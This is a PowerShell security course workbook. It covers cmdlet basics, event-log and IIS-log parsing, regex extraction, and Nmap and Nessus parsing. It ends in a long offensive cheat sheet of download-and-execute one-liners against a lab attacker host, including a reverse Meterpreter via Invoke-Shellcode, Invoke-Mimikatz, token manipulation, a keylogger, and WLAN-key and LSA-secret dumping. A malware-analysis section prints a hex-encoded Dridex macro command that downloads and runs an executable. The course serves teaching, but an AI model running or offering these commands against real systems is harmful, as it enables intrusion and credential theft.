McCray-PowershellIntro

#######################
# VMs for this course #
#######################
https://s3.amazonaws.com/StrategicSec-VMs/Win7x64.zip
    username: workshop
    password: password

https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu14.zip
    username: strategicsec
    password: strategicsec

You can do the updates in the Win7 VM (yes, it is a lot of updates).

You'll need to create directory in the Win7 VM called "c:\ps"

In this file you will also need to change the text '192.168.200.144' to the IP address of your Ubuntu host.


#####################
# Powershell Basics #
#####################

PowerShell is Microsoft’s new scripting language that has been built in since the release Vista.

PowerShell file extension end in .ps1 .

An important note is that you cannot double click on a PowerShell script to execute it.

To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell.

dir
cd
ls
cd c:\


To obtain a list of cmdlets, use the Get-Command cmdlet

Get-Command


You can use the Get-Alias cmdlet to see a full list of aliased commands.

Get-Alias


Don't worry you won't blow up your machine with Powershell
Get-Process | stop-process              What will this command do?
Get-Process | stop-process -whatif


To get help with a cmdlet, use the Get-Help cmdlet along with the cmdlet you want information about.

Get-Help Get-Command

Get-Help Get-Service –online

Get-Service -Name TermService, Spooler

Get-Service –N BITS

Start-Transcript

PowerShell variables begin with the $ symbol. First lets create a variable

$serv = Get-Service –N Spooler

To see the value of a variable you can just call it in the terminal.

$serv

$serv.gettype().fullname


Get-Member is another extremely useful cmdlet that will enumerate the available methods and properties of an object. You can pipe the object to Get-Member or pass it in

$serv | Get-Member

Get-Member -InputObject $serv


Let’s use a method and a property with our object.

$serv.Status
$serv.Stop()
$serv.Refresh()
$serv.Status
$serv.Start()
$serv.Refresh()
$serv.Status


Methods can return properties and properties can have sub properties. You can chain them together by appending them to the first call.


#############################
# Simple Event Log Analysis #
#############################

Step 1: Dump the event logs
---------------------------
The first thing to do is to dump them into a format that facilitates later processing with Windows PowerShell.

To dump the event log, you can use the Get-EventLog and the Exportto-Clixml cmdlets if you are working with a traditional event log such as the Security, Application, or System event logs.
If you need to work with one of the trace logs, use the Get-WinEvent and the ExportTo-Clixml cmdlets.

Get-EventLog -LogName application | Export-Clixml Applog.xml

type .\Applog.xml

$logs = "system","application","security"

The % symbol is an alias for the Foreach-Object cmdlet. It is often used when working interactively from the Windows PowerShell console

$logs | % { get-eventlog -LogName $_ | Export-Clixml "$_.xml" }


Step 2: Import the event log of interest
----------------------------------------
To parse the event logs, use the Import-Clixml cmdlet to read the stored XML files.
Store the results in a variable.
Let's take a look at the commandlets Where-Object, Group-Object, and Select-Object.

The following two commands first read the exported security log contents into a variable named $seclog, and then the five oldest entries are obtained.

$seclog = Import-Clixml security.xml

$seclog | select -Last 5


Cool trick from one of our students named Adam. This command allows you to look at the logs for the last 24 hours:

Get-EventLog Application -After (Get-Date).AddDays(-1)

You can use '-after' and '-before' to filter date ranges

One thing you must keep in mind is that once you export the security log to XML, it is no longer protected by anything more than the NFTS and share permissions that are assigned to the location where you store everything.
By default, an ordinary user does not have permission to read the security log.


Step 3: Drill into a specific entry
-----------------------------------
To view the entire contents of a specific event log entry, choose that entry, send the results to the Format-List cmdlet, and choose all of the properties.


$seclog | select -first 1 | fl *

The message property contains the SID, account name, user domain, and privileges that are assigned for the new login.


($seclog | select -first 1).message

(($seclog | select -first 1).message).gettype()


In the *nix world you often want a count of something (wc -l).
How often is the SeSecurityPrivilege privilege mentioned in the message property?
To obtain this information, pipe the contents of the security log to a Where-Object to filter the events, and then send the results to the Measure-Object cmdlet to determine the number of events:

$seclog | ? { $_.message -match 'SeSecurityPrivilege'} | measure

If you want to ensure that only event log entries return that contain SeSecurityPrivilege in their text, use Group-Object to gather the matches by the EventID property.


$seclog | ? { $_.message -match 'SeSecurityPrivilege'} | group eventid

Because importing the event log into a variable from the stored XML results in a collection of event log entries, it means that the count property is also present.
Use the count property to determine the total number of entries in the event log.

$seclog.Count


############################
# Simple Log File Analysis #
############################


You'll need to create the directory c:\ps and download sample iss log http://pastebin.com/raw.php?i=LBn64cyA


mkdir c:\ps
cd c:\ps
(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")


###############################################
# Intrusion Analysis Using Windows PowerShell #
###############################################

Download sample file http://pastebin.com/raw.php?i=ysnhXxTV into the c:\ps directory


(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=ysnhXxTV", "c:\ps\CiscoLogFileExamples.txt")

Select-String 192.168.208.63 .\CiscoLogFileExamples.txt


The Select-String cmdlet searches for text and text patterns in input strings and files. You can use it like Grep in UNIX and Findstr in Windows.

Select-String 192.168.208.63 .\CiscoLogFileExamples.txt | select line


To see how many connections are made when analyzing a single host, the output from that can be piped to another command: Measure-Object.

Select-String 192.168.208.63 .\CiscoLogFileExamples.txt | select line | Measure-Object


To select all IP addresses in the file expand the matches property, select the value, get unique values and measure the output.

Select-String “\b(?:\d{1,3}\.){3}\d{1,3}\b” .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique | Measure-Object


Removing Measure-Object shows all the individual IPs instead of just the count of the IP addresses. The Measure-Object command counts the IP addresses.

Select-String “\b(?:\d{1,3}\.){3}\d{1,3}\b” .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique


In order to determine which IP addresses have the most communication the last commands are removed to determine the value of the matches. Then the group command is issued on the piped output to group all the IP addresses (value), and then sort the objects by using the alias for Sort-Object: sort count –des.
This sorts the IP addresses in a descending pattern as well as count and deliver the output to the shell.

Select-String “\b(?:\d{1,3}\.){3}\d{1,3}\b” .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select value | group value | sort count -des


This will get the setting for logs in the windows firewall which should be enabled in GPO policy for analysis.
The command shows that the Firewall log is at:
%systemroot%\system32\LogFiles\Firewall\pfirewall.log, in order to open the file PowerShell will need to be run with administrative privileges.


First step is to get the above command into a variable using script logic.
Thankfully PowerShell has a built-in integrated scripting environment, PowerShell.ise.

netsh advfirewall show allprofiles | Select-String FileName | select -ExpandProperty line | Select-String “%systemroot%.+\.log" | select -ExpandProperty matches | select -ExpandProperty value | sort –uniq


##############################################
# Parsing Log files using windows PowerShell #
##############################################

Download the sample IIS log http://pastebin.com/LBn64cyA


(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")

Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV")}


The above command would give us all the WebDAV requests.

To filter this to a particular user name, use the below command:

Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV") -and ($_ | Select-String "OPTIONS")}


Some more options that will be more commonly required :

For Outlook Web Access : Replace WebDAV with OWA

For EAS : Replace WebDAV with Microsoft-server-activesync

For ECP : Replace WebDAV with ECP


####################################################################
# Windows PowerShell: Extracting Strings Using Regular Expressions #
####################################################################
To build a script that will extract data from a text file and place the extracted text into another file, we need three main elements:

1) The input file that will be parsed

(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=rDN3CMLc", "c:\ps\emails.txt")
(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=XySD8Mi2", "c:\ps\ip_addresses.txt")
(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=v5Yq66sH", "c:\ps\URL_addresses.txt")

2) The regular expression that the input file will be compared against

3) The output file for where the extracted data will be placed.

Windows PowerShell has a “select-string” cmdlet which can be used to quickly scan a file to see if a certain string value exists.
Using some of the parameters of this cmdlet, we are able to search through a file to see whether any strings match a certain pattern, and then output the results to a separate file.

To demonstrate this concept, below is a Windows PowerShell script I created to search through a text file for strings that match the Regular Expression (or RegEx for short) pattern belonging to e-mail addresses.

$input_path = ‘c:\ps\emails.txt’
$output_file = ‘c:\ps\extracted_addresses.txt’
$regex = ‘\b[A-Za-z0-9._%-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}\b’
select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file

In this script, we have the following variables:

1) $input_path to hold the path to the input file we want to parse

2) $output_file to hold the path to the file we want the results to be stored in

3) $regex to hold the regular expression pattern to be used when the strings are being matched.

The select-string cmdlet contains various parameters as follows:

1) “-Path” which takes as input the full path to the input file

2) “-Pattern” which takes as input the regular expression used in the matching process

3) “-AllMatches” which searches for more than one match (without this parameter it would stop after the first match is found) and is piped to “$.Matches” and then “$_.Value” which represent using the current values of all the matches.

Using “>” the results are written to the destination specified in the $output_file variable.

Here are two further examples of this script which incorporate a regular expression for extracting IP addresses and URLs.

IP addresses
------------
For the purposes of this example, I ran the tracert command to trace the route from my host to google.com and saved the results into a file called ip_addresses.txt. You may choose to use this script for extracting IP addresses from router logs, firewall logs, debug logs, etc.

$input_path = ‘c:\ps\ip_addresses.txt’
$output_file = ‘c:\ps\extracted_ip_addresses.txt’
$regex = ‘\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b’
select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file


URLs
----
For the purposes of this example, I created a couple of dummy web server log entries and saved them into URL_addresses.txt.
You may choose to use this script for extracting URL addresses from proxy logs, network packet capture logs, debug logs, etc.

$input_path = ‘c:\ps\URL_addresses.txt’
$output_file = ‘c:\ps\extracted_URL_addresses.txt’
$regex = ‘([a-zA-Z]{3,})://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?’
select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file


In addition to the examples above, many other types of strings can be extracted using this script.
All you need to do is switch the regular expression in the “$regex” variable!
In fact, the beauty of such a PowerShell script is its simplicity and speed of execution.


###################
# Pentester Tasks #
###################
Reference:
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/02/use-powershell-for-network-host-and-port-discovery-sweeps.aspx


Listing IPs
-----------
One of the typical ways for working with IP addressed in most scripts is to work with an octet and then increase the last one

$octect = "192.168.200."
$lastoctect = (1..255)
$lastoctect | ForEach-Object {write-host "$($octect)$($_)"}

Ping Sweep
------------------------------------------------------
PowerShell provides several methods for doing Ping
Test-Connection cmdlet
Creation of a WMI Object
.Net System.Net.NetworkInformation.Ping Object
------------------------------------------------------

function New-IPRange ($start, $end) {
$ip1 = ([System.Net.IPAddress]$start).GetAddressBytes()
[Array]::Reverse($ip1)
$ip1 = ([System.Net.IPAddress]($ip1 -join '.')).Address

$ip2 = ([System.Net.IPAddress]$end).GetAddressBytes()
[Array]::Reverse($ip2)
$ip2 = ([System.Net.IPAddress]($ip2 -join '.')).Address

for ($x=$ip1; $x -le $ip2; $x++) {
$ip = ([System.Net.IPAddress]$x).GetAddressBytes()
[Array]::Reverse($ip)
$ip -join '.'
}
}
$ping = New-Object System.Net.NetworkInformation.Ping
New-IPRange 192.168.200.1 192.168.200.150 | ForEach-Object {$ping.Send($_, 100)} | where {$_.status -eq "Success"}


Reverse Lookups
---------------
For reverse lookups using .Net Class we use the [System.Net.Dns]::GetHostEntry(IP) method Returns System.Net.IPHostEntry

[System.Net.Dns]::GetHostByAddress("162.243.126.247")


Forward Lookups
---------------
[System.Net.Dns]::GetHostAddresses("www.google.com")


Port Scans
----------
To test if a port is open on a remote host in PowerShell the best method is to use the .Net abstraction that it provides to Windows Socket library
For TCP the .Net System.Net.Sockets.TcpClient
For UDP the .Net System.Net.Sockets.UdpClient


TCP Scan
--------
$ports=22,80
$target = "192.168.200.144"
foreach ($i in $ports) {
try {
$socket = new-object System.Net.Sockets.TCPClient($target, $i);
} catch {}
if ($socket -eq $NULL) {
echo "$target:$i - Closed";
} else {
echo "$target:$i - Open";
$socket = $NULL;
}}


##########################
# Parsing Nmap XML Files #
##########################
If you are NOT using the Win7 VM provided then you can get the required files for this lab which are located in this zip file:
https://s3.amazonaws.com/StrategicSec-Files/Powershell/PowerShell-Files.zip


Run Powershell as administrator

cd C:\

Get-ExecutionPolicy
Set-ExecutionPolicy Unrestricted –Force


Parse nmap XML
.\parse-nmap.ps1 samplescan.xml

Process all XML files

.\parse-nmap.ps1 *.xml

Piping also works
dir *.xml | .\parse-nmap.ps1

Advanced parsing with filtering conditions
.\parse-nmap.ps1 samplescan.xml | where {$_.OS -like "*Windows XP*"} | format-table IPv4,HostName,OS

More parsing
.\parse-nmap.ps1 samplescan.xml | where {$_.Ports -like "*open:tcp:22*"}

Parsing with match and multiple conditions
.\parse-nmap.ps1 samplescan.xml |where {$_.Ports -match "open:tcp:80|open:tcp:443"}

CSV Export
.\parse-nmap.ps1 samplescan.xml -outputdelimiter " " | where {$_.Ports -match "open:tcp:80"} | export-csv weblisteners.csv

Import Data from CSV
$data = import-csv weblisteners.csv
$data | where {($_.IPv4 -like "10.57.*") -and ($_.Ports -match "open:tcp:22")}

Export to HTML
.\parse-nmap.ps1 samplescan.xml -outputdelimiter " " |select-object IPv4,HostName,OS | ConvertTo-Html | out-file report.html


########################################
# Parsing Nessus scans with PowerShell #
########################################
If you are NOT using the Win7 VM provided then you can get the required files for this lab which are located in this zip file:
https://s3.amazonaws.com/StrategicSec-Files/Powershell/PowerShell-Files.zip


Let’s take a look at the Import-Csv cmdlet and what are the members of the object it returns:

Import-Csv C:\class_nessus.csv | Get-Member

filter the objects:

Import-Csv C:\class_nessus.csv | where {$_.risk -eq "high"}

use the Select-Object cmdlet and only get unique entries:

Import-Csv C:\class_nessus.csv | where {$_.risk -eq "high"} | select host -Unique

Import-Csv C:\class_nessus.csv | where {"high","medium","low" -contains $_.risk} | select "Plugin ID", CVE, CVSS, Risk, Host, Protocol, Port, Name | Out-GridView


ConvertTo-Html cmdlet and turn it in to an HTML report in list format:

Import-Csv C:\class_nessus.csv | where {"high","medium","low" -contains $_.risk} | select "Plugin ID", CVE, CVSS, Risk, Host, Protocol, Port, Name | ConvertTo-Html -As List > C:\report2.html


#####################################################
# Analyzing Macro Embedded Malware                  #
# Reference:                                        #
# https://jon.glass/analyzes-dridex-malware-p1/     #
#####################################################


sudo pip install olefile
     infosecaddicts

mkdir ~/Desktop/oledump

cd ~/Desktop/oledump

wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/064016.zip

unzip 064016.zip
     infected

python oledump.py 064016.doc

python oledump.py 064016.doc -s A4 -v

- From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
- Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.


python oledump.py 064016.doc -s A5 -v

- As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.


python oledump.py 064016.doc -s A3 -v

- Look for "GVhkjbjv" and you should see:

636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B

- Take that long blob that starts with 636D and finishes with 653B and paste it in:
http://www.rapidtables.com/convert/number/hex-to-ascii.htm


############################################
# Introduction to scripting and toolmaking #
############################################
https://www.youtube.com/watch?v=usiqXcWb978


####################################################
# Running Powershell From A Command Prompt         #
# Using Powersploit & Nishang                      #
####################################################

COMMAND & 1 PARAMATER SYNTAX:
    powershell -command "& {&'some-command' someParam}"


MULTIPLE COMMAND & PARAMETER SYNTAX
    powershell -command "& {&'some-command' someParam}"; "& {&'some-command' -SpecificArg someParam}"


Tools to download to the web root (/var/www) of your StrategicSec-Ubuntu-VM:
https://github.com/mattifestation/PowerSploit.git
https://github.com/samratashok/nishang

from the strategicsec home dir copy nc.exe to /var/www/ folder

user:strategicsec
pass:strategicsec


cd ~
sudo cp nc.exe /var/www/

cd /var/www/html/
sudo git clone https://github.com/samratashok/nishang
sudo git clone https://github.com/mattifestation/PowerSploit


********************************** Simple Ping Sweep **********************************
powershell -command "50..100 | % {\""192.168.200.$($_): $(Test-Connection -count 1 -comp 192.168.200.$($_) -quiet)\""}"


********************************** Simple Port 445 Sweep **********************************
powershell -command "1..255 | % { echo ((new-object Net.Sockets.TcpClient).Connect(\""192.168.200.$_\"",445)) \""192.168.200.$_\""} 2>$null"


********************************** Simple Port Scan **********************************
powershell -command "1..1024 | % { echo ((new-object Net.Sockets.TcpClient).Connect(\""192.168.200.XX\"",$_)) \""$_ is open\""} 2>$null"


********************************** Download a file **********************************
powershell -command "(New-Object System.Net.WebClient).DownloadFile('http://192.168.200.144/nc.exe', 'nc.exe’)"


********************************** Downloading files: Binaries **********************************
powershell -command "(New-ObjectSystem.Net.WebClient).DownloadFile("http://192.168.200.144/nc.exe","c:\nc.exe“)"


********************************** Text file stdout to local file  **********************************
(New-Object System.Net.WebClient).DownloadString("http://192.168.200.144/PowerSploit/CodeExecution/Invoke-Shellcode.ps1") | Out-File -Encoding ASCII Invoke-Shellcode.ps1


********************************** Powershell Download & Execute Reverse Meterpreter **********************************
from ubuntu host browse to metasploit folder
cd ~/toolz/metasploit/

sudo ./msfconsole
use exploit/multi/handler
set ExitOnSession false
set payload windows/meterpreter/reverse_https
set LHOST 192.168.200.144
set LPORT 443
set EXITFUNC thread
exploit -j


powershell -command "IEX (New-Object Net.WebClient).DownloadString('https://s3.amazonaws.com/StrategicSec-Files/Powersploit/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.200.144 -Lport 443 -Force"


********************************** Payload which could execute shellcode from DNS TXT queries. **********************************
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://192.168.200.144/nishang/Execution/Execute-DNSTXT-Code.ps1','%TEMP%\Execute-DNSTXT-Code.ps1')
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Execute-DNSTXT-Code.ps1 32.alteredsecurity.com 64.alteredsecurity.com ns8.zoneedit.com


powershell -command "IEX (New-Object Net.WebClient).DownloadString('http://192.168.200.144/powersploit/Exfiltration/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz"


********************************** Run mimikatz via powershell  (must be run as SYSTEM) **********************************
powershell -command "IEX (New-Object Net.WebClient).DownloadString('https://s3.amazonaws.com/StrategicSec-Files/Powersploit/Invoke-Mimikatz.ps1') | Out-File -Encoding ASCII Invoke-Mimikatz.ps1; Import-Module .\Invoke-Mimikatz.ps1 ; Invoke-Mimikatz"


********************************** Token Manipulation to escalate (must be run as an Administrator) **********************************
powershell -command "IEX (New-Object Net.WebClient).DownloadString('http://192.168.200.144/powersploit/Exfiltration/Invoke-TokenManipulation.ps1') ; Invoke-TokenManipulation"

powershell -command "IEX (New-Object Net.WebClient).DownloadString('https://s3.amazonaws.com/StrategicSec-Files/Powersploit/Invoke-TokenManipulation.ps1') | Out-File -Encoding ASCII Invoke-TokenManipulation.ps1; Import-Module .\Invoke-TokenManipulation.ps1 ; Invoke-TokenManipulation"


********************************** Nihsang payload which Scan IP-Addresses, Ports and HostNames **********************************
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://192.168.200.144/nishang/Invoke-PingSweep.ps1','%TEMP%\Invoke-PingSweep.ps1')
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Invoke-PingSweep.ps1 -StartAddress 192.168.200.50 -EndAddress 192.168.200.100 -ResolveHost -ScanPort


********************************** Nihsang payload which Scan IP-Addresses, Ports and HostNames **********************************
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://192.168.200.144/nishang/Port-Scan.ps1','%TEMP%\Port-Scan.ps1')
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Port-Scan.ps1 -StartAddress 192.168.200.50 -EndAddress 192.168.200.100 -ResolveHost -ScanPort


********************************** Nishang Payload which gathers juicy information from the target. **********************************
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://192.168.200.144/nishang/Get-Information.ps1','%TEMP%\Get-Information.ps1')
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Get-Information.ps1


********************************** Nishang Payload which gathers juicy information from the target. **********************************
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://192.168.200.144/nishang/Information_Gather.ps1','%TEMP%\Information_Gather.ps1')
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Information_Gather.ps1


********************************** Nishang script which can drop and execute executables on multiple computers. **********************************
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://192.168.200.144/nishang/Run-EXEonRemote.ps1','%TEMP%\Run-EXEonRemote.ps1')
powershell.exe -ExecutionPolicy Bypass -command Invoke-Command -FilePath %TEMP%\Run-EXEonRemote.ps1 -ComputerName Test-PC


********************************** Nishang Payload which logs keys. **********************************
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://192.168.200.144/nishang/Keylogger.ps1','%TEMP%\Keylogger.ps1')
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Keylogger.ps1 16e7a8a83f04eec8ab6bc1bce9d103e3 juraghh@gmail.com ITp!Ka3099 1 http://example.com stopthis


********************************** Nishang Payload which silently browses to a URL and accepts Java Applet Run Warning **********************************
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://192.168.200.144/nishang/Browse_Accept_Applet.ps1','%TEMP%\Browse_Accept_Applet.ps1')
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Browse_Accept_Applet.ps1 http://192.168.200.144:8080/JavaExploit


********************************** Nishang Payload which dumps keys for WLAN profiles. **********************************
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://192.168.200.144/nishang/Get-WLAN-Keys.ps1','%TEMP%\Get-WLAN-Keys.ps1')
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Get-WLAN-Keys.ps1


********************************** Nishang payload which extracts LSA Secrets from local computer. **********************************
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://192.168.200.144/nishang/Get-LSASecret.ps1','%TEMP%\Get-LSASecret.ps1')
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Get-LSASecret.ps1 -filename .\servers.txt